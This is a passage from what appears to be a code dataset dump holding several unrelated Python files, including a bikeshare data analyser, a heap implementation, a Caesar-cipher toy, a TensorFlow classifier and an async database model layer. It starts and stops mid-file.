execution of above code.\n print(\"\\nThis took {} seconds.\".format(time.time() - start_time))\n \n # Prints empty space to seperate data printed by function.\n print('\\n'*2)\n\ndef station_stats(df):\n \"\"\"Takes a DataFrame and displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n # Marking time as start time in order to calculate the time taken by function to execute.\n start_time = time.time()\n \n # Counts the number of times an unique value appears in the Start Station column and prints the name of Start Station appearing the most and its count in the column.\n pop_start_station_count = df['Start Station'].value_counts().max()\n pop_start_station = df['Start Station'].mode()[0]\n print('Most popular Start Station :',pop_start_station,'\\tcount:',pop_start_station_count)\n\n # Counts the number of times an unique value appears in the End Station column and prints the name of End Station appearing the most and its count in the column.\n pop_end_station_count = df['End Station'].value_counts().max()\n pop_end_station = df['End Station'].mode()[0]\n print('Most popular End Station :',pop_end_station,'\\tcount:',pop_end_station_count)\n \n # Combines two columns in DataFrame and prints the most frequent value in this column along with its count in column\n df['journey'] = df['Start Station'] + ' TO ' + df['End Station']\n most_pop_trip = df['journey'].mode()[0]\n max_freq_count = df.groupby(['Start Station','End Station'])['Start Time'].count().max()\n print('The most popular frequent trip :',most_pop_trip,'\\tcount :',max_freq_count)\n \n # Marking the time as end time for calculation of time taken for execution of above code.\n print(\"\\nThis took {} seconds.\".format(time.time() - start_time))\n \n # Prints empty space to seperate data printed by function.\n print('\\n'*2)\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n # Marking time as start time in order to calculate the time taken by function to execute.\n start_time = time.time()\n\n # Using numpy's sum function to calculate total of trip durations.\n total_time = np.sum(df['Trip Duration'])\n print('Total travel time duration :',total_time)\n\n # Using numpy's mean function to calculate average trip duration.\n mean_time = np.mean(df['Trip Duration'])\n print('Mean travel time duration :',mean_time)\n\n # Marking the time as end time for calculation of time taken for execution of above code.\n print(\"\\nThis took {} seconds.\".format(time.time() - start_time))\n \n # Prints empty space to seperate data printed by function.\n print('\\n'*2)\n\ndef user_stats(df,city):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n \n print('\\nCalculating User Stats...\\n')\n # Marking time as start time in order to calculate the time taken by function to execute.\n start_time = time.time()\n\n # Calculating the number of unique rows in 'User_type' column and printing each type along with their respective count. 
\n user_type = df['User Type'].value_counts()\n print('Total SUBSCRIBERS :',user_type['Subscriber'],'\\tTotal CUSTOMERS:',user_type['Customer'])\n \n # Conditional statement to check if the city entered by user is 'washington'.If yes,then it displays no data as the columns dont exist in washingtons csv file.If not,then it displays the result.\n if city == 'washington':\n print('Sorry..!!There is no Birth year and Gender information for Washington city')\n else:\n # Counts number of rows for each unique value in 'Gender' column and prints each type along with its count in this column.\n gender = df['Gender'].value_counts()\n print('Total MALES :',gender['Male'],'\\tTotal FEMALES :',gender['Female'])\n \n # prints most frequently occuring value in 'Birth Year' as most common birth year,minimum of those as earliest birth year and maximum of those as latest birth year\n latest_birth_year = df['Birth Year'].max()\n earliest_birth_year = df['Birth Year'].replace([0,None]).min(skipna= True)\n common_birth_year = df['Birth Year'].replace([0,None]).mode()[0]\n print('Most common birth year :',common_birth_year,'\\nEarliest birth year :',earliest_birth_year,'\\nLatest birth year :',latest_birth_year)\n\n # Marking the time as end time for calculation of time taken for execution of above code.\n print(\"\\nThis took {} seconds.\".format(time.time() - start_time))\n\n # Prints empty space to seperate data printed by function.z\n print('\\n'*2)\n\ndef raw_data(df,city):\n \"\"\" Takes DataFrame and returns row by row data as per input provided by user. \"\"\" \n # Asks user if user want to print individual data and keeps on printing data row by row until user types 'No'.\n response = input('Do you want to see individual data ? ')\n i = 0\n while response.lower() == 'yes' or response.lower() == 'y':\n # creates a dictionary to represent the individual data\n user = {'id' : df.loc[i][0],\n 'Start Time' : df['Start Time'][i],\n 'End Time' : df['End Time'][i],\n 'Trip Duration(sec)' : df['Trip Duration'][i],\n 'Start Station' : df['Start Station'][i],\n 'End Station' : df['End Station'][i],\n 'User Type' : df['User Type'][i] }\n # Ensures that the code prints all information about every user for each city\n if city != 'washington':\n user['Gender'] = df['Gender'][i]\n user['Birth Year'] = df['Birth Year'][i]\n # prints information for each raw in the frame as a dictionary\n print(user)\n response = input('\\nDo you want to print individual data ? Enter yes or no : ')\n i += 1\n return\n\ndef main():\n # Asks the user if user wants to explore bikeshare and if the input is 'yes',it executes the code,prints the result and asks again until user enters 'no'.\n restart = input('\\nWould you like to expolre bikeshare data? Enter yes or no.\\n')\n while restart.lower() == 'yes' or restart.lower() == 'y': # conditional statement to start execution\n city, month, day = get_filters() # function is called and returned values are assigned to variables\n df = load_data(city, month, day) # function is called and returned value is assigned to variable\n time_stats(df,month,day) # function called with three arguments\n station_stats(df) # function called\n trip_duration_stats(df) # function called\n user_stats(df,city) # function called with two argumnets\n raw_data(df,city) # function called with two argumnets\n restart = input('\\nWould you like to restart? 
Enter yes or no.\\n')\n \nif __name__ == '__main__':\n # Check if the code is running as main or as imported.If its main,the main function is called.\n main()","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":13293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"429083282","text":"\"\"\"\r\nFile: arrayHeap.py\r\nNames: Laurie Jones, Harry Pinkerton, James Lawson\r\nProject: 10\r\n\"\"\"\r\n\r\nfrom p10utils.arrayList import ArrayList\r\nfrom p10utils.abstractHeap import AbstractHeap\r\n\r\n\r\nclass ArrayHeap(AbstractHeap):\r\n \"\"\"An array-based implementation of a heap.\"\"\"\r\n \r\n DEFAULT_SIZE = 10\r\n \r\n def __init__(self, sourceCollection = None):\r\n \"\"\"Initialization of a heap.\"\"\"\r\n self._heap = ArrayList() \r\n super().__init__(sourceCollection)\r\n \r\n def add(self, item):\r\n \"\"\"Adds item to the end of the array and then walks it up to the top,\r\n stopping when parent is less than the new item\"\"\"\r\n \r\n self._size += 1\r\n self._heap.append(item)\r\n curPos = len(self._heap) - 1\r\n \r\n while curPos > 0:\r\n parent = (curPos - 1) // 2\r\n parentItem = self._heap[parent]\r\n if parentItem <= item:\r\n break\r\n \r\n else:\r\n self._heap[curPos] = self._heap[parent]\r\n self._heap[parent] = item\r\n curPos = parent\r\n \r\n def pop(self):\r\n \"\"\"Swaps the top element with the last element, then walks the top\r\n element down until both children are larger than the current node.\"\"\"\r\n if self.isEmpty():\r\n raise KeyError(\"The heap is empty.\")\r\n \r\n self._size -= 1\r\n topItem = self._heap[0]\r\n bottomItem = self._heap.pop(len(self._heap) - 1)\r\n \r\n if len(self._heap) == 0:\r\n return bottomItem\r\n \r\n self._heap[0] = bottomItem\r\n lastIndex = len(self._heap) - 1\r\n curPos = 0\r\n \r\n while True:\r\n leftChild = curPos * 2 + 1\r\n rightChild = curPos * 2 + 2\r\n \r\n if leftChild > lastIndex:\r\n break\r\n \r\n if rightChild > lastIndex:\r\n maxChild = leftChild\r\n \r\n else:\r\n leftItem = self._heap[leftChild]\r\n rightItem = self._heap[rightChild]\r\n if leftItem < rightItem:\r\n maxChild = leftChild\r\n \r\n else:\r\n maxChild = rightChild\r\n \r\n maxItem = self._heap[maxChild]\r\n \r\n if bottomItem <= maxItem:\r\n break\r\n \r\n else:\r\n self._heap[curPos] = self._heap[maxChild]\r\n self._heap[maxChild] = bottomItem\r\n curPos = maxChild\r\n \r\n return topItem\r\n\r\n\r\n\r\n\r\n def _getRoot(self):\r\n \"\"\"Should return the way to access the root based on an implementation.\"\"\"\r\n return 0\r\n \r\n def _getParent(self, index):\r\n \"\"\"Returns access to the parent from the index or node.\"\"\"\r\n return (index - 1) / 2\r\n \r\n def _getLeftChild(self, index):\r\n \"\"\"Returns access to the left child from the index or node.\"\"\"\r\n return index * 2 + 1\r\n \r\n def _getRightChild(self, index): \r\n \"\"\"Returns access to the right child from the index or node.\"\"\"\r\n return index * 2 + 2\r\n \r\n def _getData(self, index):\r\n \"\"\"Returns the data from the index or node.\"\"\"\r\n return self._heap[index]\r\n \r\n def _insideTree(self, node):\r\n \"\"\"Returns True if the index or node is within the tree.\"\"\"\r\n lastIndex = len(self._heap) - 1\r\n if node <= lastIndex:\r\n return True\r\n else:\r\n return False\r\n 
\r\n\r\n\r\n\r\n","sub_path":"project10/arrayHeap.py","file_name":"arrayHeap.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229890853","text":"import sys\n\nfp = open(sys.argv[1], \"r\")\noutput = open(sys.argv[2], \"w\")\n\ntotal = int(fp.readline())\n\ncase = 0\n\nalphabet = {\n \"A\": 1,\n \"B\": 2,\n \"C\": 3,\n \"D\": 4,\n \"E\": 5,\n \"F\": 6,\n \"G\": 7,\n \"H\": 8,\n \"I\": 9,\n \"J\": 10,\n \"K\": 11,\n \"L\": 12,\n \"M\": 13,\n \"N\": 14,\n \"O\": 15,\n \"P\": 16,\n \"Q\": 17,\n \"R\": 18,\n \"S\": 19,\n \"T\": 20,\n \"U\": 21,\n \"V\": 22,\n \"W\": 23,\n \"X\": 24,\n \"Y\": 25,\n \"Z\": 26\n}\n\n\nfor string in fp:\n case = case + 1\n final = \"\"\n\n for letter in string:\n # print(\"final:\", final)\n if letter == \"\\n\":\n continue\n\n if len(final) == 0:\n final = final + letter\n continue\n\n if alphabet[letter] < alphabet[final[0]]:\n final = final + letter\n continue\n else:\n final = letter + final\n\n out = \"Case #{}: {}\".format(case, final)\n print(out)\n output.write(out + \"\\n\")\n\nfp.close()\noutput.close()\n","sub_path":"codes/CodeJamCrawler/CJ_16_1/16_1_1_SatKan_one.py","file_name":"16_1_1_SatKan_one.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"107003640","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport re\n\nif sys.version_info.major >= 3:\n import urllib.request\n\n r = urllib.request.urlopen('https://data.iana.org/TLD/tlds-alpha-by-domain.txt')\n assert r.status == 200\n data = r.read().decode('utf-8').split('\\n')\nelse:\n import urllib\n\n r = urllib.urlopen('https://data.iana.org/TLD/tlds-alpha-by-domain.txt')\n assert r.getcode() == 200\n data = r.read().split('\\n')\n\nversion = re.match('^# Version (?P[0-9]+).*$', data[0]).group('version')\ntlds = [i.lower() for i in data[1:] if i and not i.startswith('#')]\n\n\ntarget_dir = 'tlds'\n\nwith open(os.path.join(target_dir, '_data.py'), 'w') as f:\n f.write('tld_set = set(%s)\\n' % (tlds, ))\n\nwith open('version.py', 'w') as f:\n f.write('version = %s\\n' % version)\n","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"560498409","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\n\n# Create Initial variable\ndef init_variable(shape):\n return(tf.Variable(tf.truncated_normal(shape = shape)))\n\n# Fix random variable\nseed = 100\ntf.set_random_seed(seed)\n\n# Import data\nDF = pd.read_excel('proto.xlsx', sheetname=0)\ndf = np.array(DF.iloc[1:380, 3:9])\n\n# Control panel\nLEARNING_RATE = 0.01\nTRAINING_EPOCHS = 1000\nBATCH_SIZE = 100\n\n# Placeholder variables\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\n\nNF = 3\nNN = 100\nNUM_LAYER = 5\n\n# First Layer\nw0 = init_variable(shape=[NF, NN])/np.sqrt(NF/2)\nb0 = init_variable(shape=[NN])\nlayer = tf.nn.relu(tf.matmul(x, w0) + b0)\n\nfor Iter in range(NUM_LAYER):\n w = init_variable(shape=[NN, NN])/np.sqrt(NN/2)\n b = init_variable(shape=[NN])\n layer = tf.nn.relu(tf.matmul(layer, w) + b)\n\n# Final Layer\nw = init_variable(shape=[NN, NF])/np.sqrt(NN/2)\nb = init_variable(shape=[NF])\nscore = tf.matmul(layer, w) + b\n\n# Optimization method\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=score))\ntrain = 
tf.train.AdagradOptimizer(LEARNING_RATE).minimize(cost)\n\n# Performance measures\nprediction = tf.argmax(score, 1)\ncorrect_prediction = tf.equal(prediction, tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n# Create TensorFlow session\nwith tf.Session() as sess:\n # Initialize variables\n tf.global_variables_initializer().run()\n\n # train\n for epoch in range(TRAINING_EPOCHS):\n _, cost_this_batch = sess.run([train, cost], feed_dict={x: df[0:300, 0:3], y: df[0:300, 3:6]})\n print(\"Optimization Finished!\")\n\n print(\"Accuracy:\", sess.run(accuracy, feed_dict={x: df[300:, 0:3], y: df[300:, 3:6]}))\n","sub_path":"ML.Proto/ProtoML.py","file_name":"ProtoML.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295611233","text":"import functools\nimport itertools\nimport json\nimport logging\nimport uuid\nfrom abc import ABCMeta\nfrom operator import and_\n\nimport sqlalchemy as sa\nfrom aiohttp.web import Request\nfrom functools import reduce\nfrom sqlalchemy.dialects.postgresql import JSONB, ARRAY\nfrom sqlalchemy.sql.elements import ClauseElement\nfrom sqlalchemy import func\n\nfrom . import utils, exceptions, aviews, sql_literals\n\n\nclass ConnectionLogger:\n logger = logging.getLogger('common.db')\n\n def __init__(self, connection):\n self._connection = connection\n\n def log(self, sql):\n if not self.logger.hasHandlers():\n return\n elif isinstance(sql, str):\n s = sql\n else:\n s = sql.compile(\n dialect=sql_literals.LiteralDialect(),\n compile_kwargs={\"literal_binds\": True},\n )\n self.logger.debug(s)\n\n def execute(self, sql, *args, **kwargs):\n self.log(sql)\n return self._connection.execute(sql, *args, **kwargs)\n\n def scalar(self, sql, *args, **kwargs):\n self.log(sql)\n return self._connection.scalar(sql, *args, **kwargs)\n\n\ndef get_app_from_parameters(*args, **kwargs):\n app = None\n if kwargs.get('request') is not None:\n app = kwargs['request'].app\n elif args and (isinstance(args[0], (MetaModel, Model, Request)) or hasattr(args[0], 'app')):\n app = args[0].app\n return app\n\n\ndef method_connect_once(arg):\n def with_arg(func):\n @functools.wraps(func)\n async def wrapper(*args, **kwargs):\n if kwargs.get('connection') is None:\n app = get_app_from_parameters(*args, **kwargs)\n async with app['db'].acquire() as connection:\n kwargs['connection'] = connection\n return await func(*args, **kwargs)\n else:\n return await func(*args, **kwargs)\n return wrapper\n\n if not callable(arg):\n return with_arg\n return with_arg(arg)\n\n\ndef method_redis_once(arg):\n redis = 'redis'\n\n def with_arg(func):\n @functools.wraps(func)\n async def wrapper(*args, **kwargs):\n if kwargs.get(redis) is None:\n app = get_app_from_parameters(*args, **kwargs)\n async with app[redis].get() as connection:\n kwargs[redis] = connection\n return await func(*args, **kwargs)\n else:\n return await func(*args, **kwargs)\n return wrapper\n\n if not callable(arg):\n redis = arg\n return with_arg\n\n return with_arg(arg)\n\n\nclass MetaModel(ABCMeta):\n def __new__(mcls, name, bases, namespace):\n cls = ABCMeta.__new__(mcls, name, bases, namespace)\n name = utils.convert_class_name(name)\n cls.models[name] = cls\n return cls\n\n\nclass Model(dict, metaclass=MetaModel):\n models = {}\n app = None\n primary_key = 'id'\n validators = ()\n fields_permanent = () # Fields need to be saved\n fields_readonly = ()\n fields_list = ()\n fields_one = None\n\n @classmethod\n def 
factory(cls, app):\n return type(cls.__name__, (cls,), {'app': app})\n\n def copy_object(self):\n cls = type(self)\n obj = cls(\n (n, v)\n for n, v in dict.items(self)\n if not isinstance(v, ClauseElement))\n return obj\n\n def pretty(self):\n return json.dumps(self, indent=3, cls=aviews.JsonEncoder)\n\n @property\n def pk(self):\n return self.get(self.primary_key)\n\n @pk.setter\n def pk(self, value):\n self[self.primary_key] = value\n\n def __getattr__(self, item):\n if item in self:\n return self[item]\n return getattr(super(), item)\n\n def __setattr__(self, key, value):\n if key == 'pk':\n key = self.primary_key\n self[key] = value\n\n @classmethod\n def _where(cls, args):\n if not args:\n raise ValueError('Where where?')\n elif isinstance(args[0], (int, str, uuid.UUID)):\n first, *tail = args\n args = [cls.table.c[cls.primary_key] == first]\n args.extend(tail)\n return reduce(and_, args),\n\n @classmethod\n def to_column(cls, fields):\n t = cls.table.c\n result = []\n for f in fields:\n if isinstance(f, str):\n f = getattr(t, f)\n result.append(f)\n return result\n\n @classmethod\n def set_defaults(cls, data: dict):\n pass\n\n @classmethod\n async def _get_one(cls, *args, connection=None, fields=None):\n args = cls._where(args)\n if fields:\n fields = cls.to_column(fields)\n elif cls.fields_one:\n fields = cls.to_column(cls.fields_one)\n\n if fields:\n sql = sa.select(fields).select_from(cls.table)\n else:\n sql = cls.table.select()\n\n result = await connection.execute(sql.where(*args))\n return await result.first()\n\n @classmethod\n @method_connect_once\n async def get_one(cls, *args, connection=None, fields=None, silent=False):\n \"\"\"\n Extract by id\n \"\"\"\n r = await cls._get_one(*args, connection=connection, fields=fields)\n if r:\n return cls(**r)\n elif not silent:\n raise exceptions.NotFound()\n\n @method_connect_once\n async def load_fields(self, *fields, connection, force_update=False):\n fields = set(fields)\n if force_update is False:\n fields = fields - set(self)\n elif isinstance(force_update, (list, tuple)):\n fields = fields.union(force_update)\n\n if fields:\n r = await self._get_one(\n *self._where([self.pk]),\n connection=connection,\n fields=fields)\n dict.update(self, r)\n\n @classmethod\n @method_connect_once\n async def get_list(cls, *args, connection, fields=None,\n offset=None, limit=None, sort=None,\n select_from=None):\n \"\"\"Extract list\"\"\"\n if fields:\n fields = cls.to_column(fields)\n elif cls.fields_list:\n fields = cls.to_column(cls.fields_list)\n\n if fields:\n sql = sa.select(fields).select_from(cls.table)\n else:\n sql = cls.table.select()\n\n for i in select_from or ():\n sql = sql.select_from(i)\n\n if args and args[0] is not None:\n sql = sql.where(reduce(and_, args))\n\n if offset is not None:\n sql = sql.offset(offset)\n\n if limit is not None:\n sql = sql.limit(limit)\n\n if isinstance(sort, str):\n sql = sql.order_by(sort)\n elif sort:\n sql = sql.order_by(*sort)\n\n result = await connection.execute(sql)\n l = []\n async for row in result:\n l.append(cls(**row))\n return l\n\n @classmethod\n @method_connect_once\n async def get_dict(cls, *where_and, connection=None,\n fields=None, sort=None, **kwargs):\n where = []\n if where_and:\n if isinstance(where_and[0], (list, tuple, str, int)):\n v, *where_and = where_and\n kwargs[cls.primary_key] = v\n for k, v in kwargs.items():\n if isinstance(v, (list, tuple)):\n if v:\n where.append(cls.table.c[k].in_(v))\n else:\n where.append(cls.table.c[k] == v)\n\n where.extend(where_and)\n if 
where:\n where = (reduce(and_, where),)\n else:\n where = ()\n if not fields:\n fields = None\n elif cls.primary_key not in fields:\n fields.append(cls.primary_key)\n l = await cls.get_list(\n *where, connection=connection,\n sort=sort, fields=fields)\n return {i.pk: i for i in l}\n\n @classmethod\n def get_table_from_django(cls, model, *jsonb, **field_type):\n options = model._meta\n fields = []\n for f in options.get_fields():\n i = f.name\n if i in jsonb:\n fields.append((i, JSONB))\n elif i in field_type:\n fields.append((i, field_type[i]))\n elif f.many_to_one:\n fields.append((f.column,))\n elif f.related_model is not None:\n continue\n else:\n fields.append((i,))\n return sa.table(options.db_table, *[sa.column(*f) for f in fields])\n\n @classmethod\n @method_connect_once\n async def _pg_scalar(cls, sql, connection=None):\n return await connection.scalar(sql)\n\n @classmethod\n @method_redis_once\n async def get_count(cls, *args, postfix=None, connection=None, redis=None):\n \"\"\"\n Extract query size\n \"\"\"\n sql = cls.table.count()\n\n if args:\n sql = sql.where(reduce(and_, args))\n\n if not postfix:\n postfix = utils.get_hash(\n str(sql.compile(compile_kwargs={\"literal_binds\": True})))\n\n key = cls.app.name + ':count:' if cls.app and hasattr(cls.app, 'name') else 'count:'\n key += postfix\n\n count = await redis.get(key)\n if count is not None:\n return int(count)\n\n count = await cls._pg_scalar(sql=sql, connection=connection)\n await redis.set(key, count)\n await redis.expire(key, 3 * 60)\n\n return count\n\n @classmethod\n @method_connect_once\n @method_redis_once\n async def get_sum(cls, column, where, postfix=None, delay=0,\n connection=None, redis=None):\n \"\"\"Calculates sum\"\"\"\n sql = sa.select([func.sum(cls.table.c[column])]).where(where)\n\n if not postfix:\n postfix = utils.get_hash(\n str(sql.compile(compile_kwargs={\"literal_binds\": True})))\n\n key = cls.app.name + ':aggregate:sum:' if cls.app and hasattr(cls.app, 'name') else 'aggregate:sum:'\n key += postfix\n\n if delay:\n count = await redis.get(key)\n if count is not None:\n return int(count)\n\n count = await cls._pg_scalar(sql=sql, connection=connection)\n\n if count is None:\n count = 0\n elif delay:\n await redis.set(key, count)\n await redis.expire(key, delay)\n\n return count\n\n @classmethod\n @method_connect_once\n async def create(cls, *, connection, **kwargs):\n \"\"\"Inserts new object\"\"\"\n pk = cls.table.c[cls.primary_key]\n cls.set_defaults(kwargs)\n uid = await connection.scalar(\n cls.table.insert().returning(pk).values(kwargs))\n kwargs[cls.primary_key] = uid\n return cls(**kwargs)\n\n @method_connect_once\n async def save(self, *, fields=None, connection):\n pk_field = self.table.c[self.primary_key]\n self.set_defaults(self)\n if self.primary_key in self:\n saved = await self._get_one(self.pk, connection=connection)\n else:\n saved = False\n if not saved:\n pk = await connection.scalar(\n self.table.insert().returning(pk_field).values(self))\n self[self.primary_key] = pk\n return pk\n if fields:\n fields = list(itertools.chain(fields, self.fields_permanent))\n values = {k: v for k, v in self.items()\n if k in fields}\n elif self.fields_readonly:\n values = {k: v for k, v in self.items()\n if k not in self.fields_readonly}\n else:\n values = self\n pk = await connection.scalar(\n self.table.update()\n .where(pk_field == self.pk)\n .returning(pk_field)\n .values(values)\n )\n assert self.pk == pk\n\n return pk\n\n @method_connect_once\n async def update_increment(self, 
connection=None, **kwargs):\n t = self.table\n\n dict_update = {\n t.c[field]: t.c[field] + value\n for field, value in kwargs.items()\n }\n\n await connection.execute(\n t.update().where(\n t.c[self.primary_key] == self.pk\n ).values(dict_update))\n\n @classmethod\n @method_connect_once\n async def update_fields(cls, where, connection=None, **kwargs):\n t = cls.table\n\n dict_update = {\n t.c[field]: value\n for field, value in kwargs.items()\n }\n\n await connection.execute(\n t.update().\n where(where).\n values(dict_update))\n\n @method_connect_once\n async def update_json(self, *args, connection=None, **kwargs):\n t = self.table\n if args:\n if len(args) > 1 and not kwargs:\n field, *path, value = args\n else:\n field, *path = args\n value = kwargs\n for p in reversed(path):\n value = {p: value}\n kwargs = {field: value}\n elif not kwargs:\n raise ValueError('Need args or kwargs')\n\n await connection.scalar(\n t.update().where(\n t.c[self.primary_key] == self.pk\n ).values(\n {\n t.c[field]: sa.func.coalesce(\n t.c[field], sa.cast({}, JSONB)\n ) + sa.cast(value, JSONB)\n for field, value in kwargs.items()\n }\n ).returning(t.c[self.primary_key]))\n\n @classmethod\n @method_connect_once\n async def delete_where(cls, *where, connection=None):\n t = cls.table\n\n where = cls._where(where)\n\n await connection.execute(\n t.delete().where(*where))\n\n @classmethod\n @method_connect_once\n async def get_or_create(cls, *args, defaults=None, connection):\n pk_field = getattr(cls.table.c, cls.primary_key)\n if args:\n pass\n elif cls.primary_key in defaults:\n args = (defaults[cls.primary_key],)\n\n if args:\n saved = await cls._get_one(*args, connection=connection)\n if saved:\n return saved, False\n\n pk = await connection.scalar(\n cls.table.insert().returning(pk_field).values(defaults))\n obj = cls(**defaults)\n obj.pk = pk\n return obj, True\n\n @classmethod\n def validate(cls, data):\n \"\"\"Returns valid object or exception\"\"\"\n validators = cls.validators or [cls.default_validator]\n for validator in validators:\n data = validator(data)\n return cls(**data)\n\n @classmethod\n def default_validator(cls, data):\n return {f: data.get(f) for f in cls.table.columns.keys()}\n\n\nclass AppModels:\n \"\"\"\n Class to managing all models of application\n \"\"\"\n def __init__(self, app):\n self.app = app\n\n def __getitem__(self, item):\n if hasattr(self, item):\n return getattr(self, item)\n return KeyError()\n\n def __getattr__(self, item):\n if item in Model.models:\n sub_class = Model.models[item].factory(self.app)\n setattr(self, item, sub_class)\n return sub_class\n raise AttributeError()\n\n @staticmethod\n def import_all_models(apps_path):\n \"\"\"Imports all the models from apps_path\"\"\"\n utils.import_module_from_all_apps(apps_path, 'amodels')\n\n @staticmethod\n def import_all_models_from_packages(package):\n \"\"\"Import all the models from package\"\"\"\n utils.import_modules_from_packages(package, 'amodels')\n","sub_path":"dvhb_hybrid/amodels.py","file_name":"amodels.py","file_ext":"py","file_size_in_byte":15616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"348370036","text":"# Capturar do terminal 3 argumentos\n# um que sera uma palavra, outro que sera um comando para criptografar ou decriptar\n# outro que sera a chave da criptografia\n\n# ex: python pedro encrypt 1\n# saida: qfesp\n# terminal: ./script.py mensagem cript/decript chave\n\nimport sys\n\nalphabet = list('abcdefghijklmnoprstuvwxyz')\n\nmessage = 
list(sys.argv[1])\ncommand = sys.argv[2]\nkey = int(sys.argv[3])\n\n\ndef decrypt(message, key):\n decryptedWord = []\n\n for character in message:\n charOnAlphabet = alphabet.index(character)\n\n if (charOnAlphabet + key) >= len(alphabet):\n returnedCharAlphabet = len(alphabet) - (charOnAlphabet + key)\n decryptedWord.append(alphabet[returnedCharAlphabet])\n\n else:\n decryptedWord.append(alphabet[charOnAlphabet - key])\n return decryptedWord\n\n\ndef encrypt(message, key):\n encryptedWord = []\n\n for character in message:\n charOnAlphabet = alphabet.index(character)\n\n if (charOnAlphabet + key) >= len(alphabet):\n returnedCharAlphabet = len(alphabet) - (charOnAlphabet + key)\n encryptedWord.append(alphabet[returnedCharAlphabet])\n\n else:\n encryptedWord.append(alphabet[charOnAlphabet + key])\n\n return encryptedWord\n\n\nfor character in message:\n if command == 'encrypt':\n result = encrypt(message, key)\n\n if command == 'decrypt':\n result = decrypt(message, key)\n\nprint('Texto:')\nprint(''.join(result))\n","sub_path":"exercicios/criptografia.py","file_name":"criptografia.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161541339","text":"import os\nfrom share.constants import Config\n\n\ndef run_command(filename, directory):\n jar_path = Config.PROJECT_DIR + Config.MUSIC_JAR\n command = 'java -cp {}: Main {} {}'.format(jar_path, filename, directory)\n print(\"command=\", command)\n r = os.popen(command)\n info = r.readlines()\n print(info)\n return info\n\n\nif __name__ == \"__main__\":\n run_command('/Users/123/Documents/web_projects/emow/code/emow/upload/wav/wistful4_test.wav',\n '/Users/123/Documents/web_projects/emow/code/emow/wavfiles/Test/positive/')","sub_path":"share/run_command.py","file_name":"run_command.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"168128641","text":"import urllib.request as req\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n#market = 'NSE'\ndef getBulkDeals(market):\n url = \"http://www.moneycontrol.com/stocks/marketstats/blockdeals/\" + market.lower()\n try:\n page = req.urlopen(url)\n soup = BeautifulSoup(page,\"html.parser\")\n table=soup.find(text=\"Company\").find_parent(\"table\")\n\n d = []\n for row in table.findAll(\"tr\")[2:]:\n line = [cell.get_text(strip=True) for cell in row.findAll(\"td\")]\n sym = line[1]\n typ = line[3]\n qty = line[4]\n #print(sym,typ,qty)\n d.append({'Symbol': sym, 'Type': typ, 'Qty': qty})\n\n pd.DataFrame(d)\n\n s = {}\n for r in d:\n sym = r['Symbol']\n typ = r['Type']\n qty = r['Qty']\n if typ =='Buy':\n qty = qty\n else:\n qty = int(qty) * -1\n #print(sym + ':' + str(qty))\n s.setdefault(sym,{'Qty':0})\n s[sym]['Qty'] += int(qty)\n\n print('\\nStocks traded with significant bulkdeals in ' + market.upper() + ':\\n')\n for key in s:\n if abs(s[key]['Qty']) > 50000:\n print(key,'=>',s[key]['Qty'])\n except:\n print('Error occurred while retrieving bulk deals in %s!' 
%(market.upper()))\n\n","sub_path":"old/BulkDeals.py","file_name":"BulkDeals.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308908636","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/9/8 20:44\n# @Author : heyee (jialeyang)\n\n# -*- coding: utf-8 -*-\n# @Time : 2021/9/7 15:50\n# @Author : heyee (jialeyang)\n\nimport os.path as osp\nimport os\nfrom collections import defaultdict\nimport json\nfrom eval_performance import *\nfrom tqdm import tqdm\nimport pandas as pd\nfrom collections import Counter\n\ntqdm.pandas()\n\n\nclass AnalysisFrq:\n\n def __init__(self):\n self.frq_dict = defaultdict()\n\n def count_frq(self, data):\n res = Counter(data)\n res_dict = dict(res)\n res_dict2 = dict(sorted(res_dict.items(), key=lambda item: item[1], reverse=True))\n # out_file = ''\n # fout = open(out_file, 'w', encoding='utf-8')\n # json.dump(res_dict2, fout, ensure_ascii=False, indent=4)\n with open('/Users/apple/XHSworkspace/data/structure/food/dataset/frq_ana/笔记query_frq_ana.json', 'w', encoding='utf-8') as fp:\n json.dump(res_dict2, fp, ensure_ascii=False, indent=4)\n print(data)\n\n def read_file(self, file):\n \"\"\" file format: note_id \\t\\t property \\t\\t note\n \"\"\"\n with open(file, 'r', encoding='utf-8') as reader:\n tmp = reader.read()\n lines = tmp.split(\"\\n\")\n return [w for w in lines if len(w) > 0]\n\n def write_file(self, file, data):\n with open(file, 'w', encoding='utf-8') as writer:\n for parsed_text in data:\n if isinstance(parsed_text, str) and len(parsed_text) > 0:\n writer.write(f'{parsed_text}\\n')\n else:\n print(parsed_text)\n\n\nif __name__ == '__main__':\n ana = AnalysisFrq()\n dir_path = 